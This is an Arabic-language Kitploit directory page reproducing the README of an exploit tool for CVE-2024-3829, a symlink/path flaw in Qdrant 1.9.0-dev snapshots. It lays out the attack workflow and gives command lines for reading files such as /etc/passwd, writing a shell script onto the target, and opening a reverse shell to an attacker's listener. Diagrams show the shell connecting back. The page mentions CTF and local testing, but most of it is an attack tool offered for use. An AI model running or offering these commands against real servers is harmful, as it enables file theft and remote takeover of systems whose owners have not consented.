Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-3829 — CVE-2024-3829 | Kitploit
أدوات/GitHubGitHub/fabse-hack/cve-2024-3829
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبCTFاختبار الاختراقتطوير الحمولات
GitHubfabse-hack/cve-2024-3829

CVE-2024-3829

CVE-2024-3829

عرض المستودع
1منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-3829 لـ Qdrant - استغلال الثغرة

root@kitploit:~
 ########################### THIS IS AN EXPLOIT FOR CVE-2024-3829 IN QDRANT 1.9.0-dev ###########################  
 _______  __   __  _______         _______  _______  _______  _   ___         _______   _____   _______  _______   
|       ||  | |  ||       |       |       ||  _    ||       || | |   |       |       | |  _  | |       ||  _    |  
|       ||  |_|  ||    ___| ____  |____   || | |   ||____   || |_|   | ____  |___    | | |_| | |____   || | |   |  
|       ||       ||   |___ |____|  ____|  || | |   | ____|  ||       ||____|  ___|   ||   _   | ____|  || |_|   |  
|      _||       ||    ___|       | ______|| |_|   || ______||___    |       |___    ||  | |  || ______||___    |  
|     |_  |     | |   |___        | |_____ |       || |_____     |   |        ___|   ||  |_|  || |_____     |   |  
|_______|  |___|  |_______|       |_______||_______||_______|    |___|       |_______||_______||_______|    |___|  
  
 ############################################### by fabse-hack.de ###############################################  

يُوثّق هذا المستودع ويُوضّح CVE-2024-3829 الخاص بـ qdrant/qdrant (v1.9.0-dev)

  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2024-3829
  • المزيد من المعلومات وفكرة هذا المستودع:
  • Huntr: https://huntr.com/bounties/abd9c906-75ee-4d84-b76d-ce1386401e08
  • incibe: https://www.incibe.es/en/incibe-cert/early-warning/vulnerabilities/cve-2024-3584
  • GitHub: https://github.com/qdrant/qdrant/commit/15479a45ffa3b955485ae516696f7e933a8cce8a

الدعم والتبرع

Paypal:

اشترِ لي قهوة:

نظرة عامة

تتيح الثغرة التلاعب بأرشيفات اللقطات عن طريق حيل الروابط الرمزية/المسارات. وهذا يُتيح فئتين من التأثير بالإضافة إلى شيل عكسي هاهاها:

  1. قراءة ملف
  2. كتابة ملف
  3. تنفيذ شيل عكسي

اعتماداً على البيئة، قد تتطور أدوات كتابة الملفات إلى تنفيذ كود.

البرنامج المتأثر (انظر رابط NVD)

  • المنتج: Qdrant
  • الإصدار: 1.9.0-dev
  • المكون: استيراد/تصدير اللقطات

ملاحظة حول رقم الإصدار:

هذا الإصدار لم يعد متاحاً على الشبكة العنكبوتية العالمية (بعض الناس يسمونه "الإنترنت").
في مستودع qdrant، أشار تقرير NVD Nist إلى الـ commit، وهو الإصدار المعرّض للخطر v1.9.0-dev.
إذا كنت ترغب في تثبيت هذا الإصدار لـ CTF / أغراض أخرى على docker، استخدم:

root@kitploit:~
git clone https://github.com/qdrant/qdrant.git
cd qdrant
git checkout 15479a45ffa3b955485ae516696f7e933a8cce8a^
docker build -t qdrant:1.9.0-dev-vuln .
docker run -p 6333:6333 qdrant:1.9.0-dev-vuln

سير العمل (مبسّط)

  1. إنشاء مجموعة
  2. توليد لقطة
  3. فكّ اللقطة وتعديلها محلياً
  4. حقن رابط رمزي في الأرشيف هدف القراءة/الكتابة
  5. رفع اللقطة المعدّلة
  6. تشغيل استعادة اللقطة
  7. تقييم النتيجة قراءة محتوى ملف / كتابة ملف / تنفيذ شيل عكسي

محتويات المستودع

  • cve_2024_3829.py - أداة استغلال لسير عمل القراءة/الكتابة/التشغيل
  • requirements.txt - تبعيات Python

المتطلبات

  • يُفضّل نظام Kali Linux
  • Python 3.10+
  • خادم Qdrant قيد التشغيل للاختبار المحلي
  • حزمة Python requests

التثبيت:

root@kitploit:~
python3 -m pip install -r requirements.txt

الاستخدام

عرض جميع الخيارات:

root@kitploit:~
python3 cve_2024_3829.py -h

أمثلة:

root@kitploit:~
# وضع القراءة
python3 cve_2024_3829.py -m read -tu http://target_ip -tp <target_port> -tpath /etc/ -tf passwd

# وضع الكتابة
python3 cve_2024_3829.py -m write -tu http://target_ip -tp <target_port> -tpath /tmp/ -apath /tmp/ -af shell.sh

# وضع الشيل العكسي
python3 cve_2024_3829.py -m reverse_shell -tu http://target_ip -tp <target_port> -ai <listener_ip> -ap <listener_port>

المعاملات المتاحة

  • -h, --help: عرض المساعدة لواجهة سطر الأوامر
  • -m, --mode: واحد من read, write, reverse_shell (مطلوب)
    معاملات الهدف:
  • -tu, --target_url: عنوان Qdrant الأساسي (الافتراضي في النص البرمجي)
  • -tp, --target_port: منفذ الهدف Qdrant (الافتراضي: 6333)
  • -tpath, --target_path: مسار الهدف البعيد (الافتراضي: /etc/)

ملاحظات

  • يجب أن يكون --target_url هو العنوان الأساسي دون إضافة المنفذ في النهاية إذا قمت بتمرير --target_port بشكل منفصل، لأن النص البرمجي يُنشئ الروابط بالصيغة <url>:<target_port>/....
  • في وضع read، يدمج النص البرمجي --target_path و --target_file_name (مثال /etc/ + passwd).
  • في وضع write، يجب أن يشير --attacker_path إلى ملف محلي موجود، و--attacker_file_name يُحدد اسم الملف البعيد.
  • لاختبارات الشبكة عبر حدود Docker/WSL/المضيف، تحقق من قابلية الوصول أولاً (مثلًا باستخدام netcat) قبل تشغيل وضع التشغيل.
root@kitploit:~
sequenceDiagram
    participant Attacker
    participant Exploit
    participant Target
    participant Listener

    Attacker->>Exploit: Start exploit script
    Exploit->>Listener: Start TCP listener
    Exploit->>Target: Create malicious collection
    Exploit->>Target: Upload trigger script
    Exploit->>Target: Overwrite executable
    Exploit->>Target: Call /stacktrace endpoint
    Target->>Listener: Reverse shell connection
    Listener->>Attacker: Interactive shell access
root@kitploit:~
flowchart TD
    Start[Start Listener]
    Bind[Bind to attacker port]
    Listen[Wait for connection]
    Accept[Accept incoming connection]
    Interactive[Interactive shell session]
    End[Connection closed]

    Start --> Bind
    Bind --> Listen
    Listen --> Accept
    Accept --> Interactive
    Interactive --> End
تنزيل الأداة
  • -tf, --target_file_name: اسم ملف الهدف البعيد (الافتراضي: passwd)
    معاملات المهاجم:
  • -ai, --attacker_ip: عنوان IP للاستدعاء/المستمع لوضع الشيل العكسي
  • -ap, --attacker_port: منفذ الاستدعاء/المستمع (الافتراضي: 9001)
  • -apath, --attacker_path: مسار الملف المحلي للمهاجم لوضع الكتابة (الافتراضي: /tmp/)
  • -af, --attacker_file_name: اسم الملف المستخدم على الهدف في وضع الكتابة (الافتراضي: shell.sh)